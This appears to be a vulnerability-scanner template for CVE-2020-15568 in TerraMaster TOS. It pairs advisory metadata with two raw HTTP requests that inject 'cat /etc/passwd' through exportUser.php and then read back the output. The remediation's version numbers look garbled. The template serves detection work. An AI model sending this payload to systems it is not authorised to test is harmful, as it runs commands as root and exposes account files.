id: CVE-2020-15568 info: name: TerraMaster TOS <.1.29 - Remote Code Execution author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-15568 - https://help.terra-master.com/TOS/view/ - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568 - https://github.com/n0bugz/CVE-2020-15568 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 epss-score: 0.96535 epss-percentile: 0.9952 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master product: tos tags: cve2020,cve,terramaster,rce,terra-master variables: filename: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - | GET /include/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100d6c27ed07a75683d4b66588b7e1e203beb54b7e5048371381ded7025fe4c641602204a7d600f7eeae530ec0833b31463207124bbc75d633f8423fd7234e091fc05c4:922c64590222798bb761d5b6d8e72950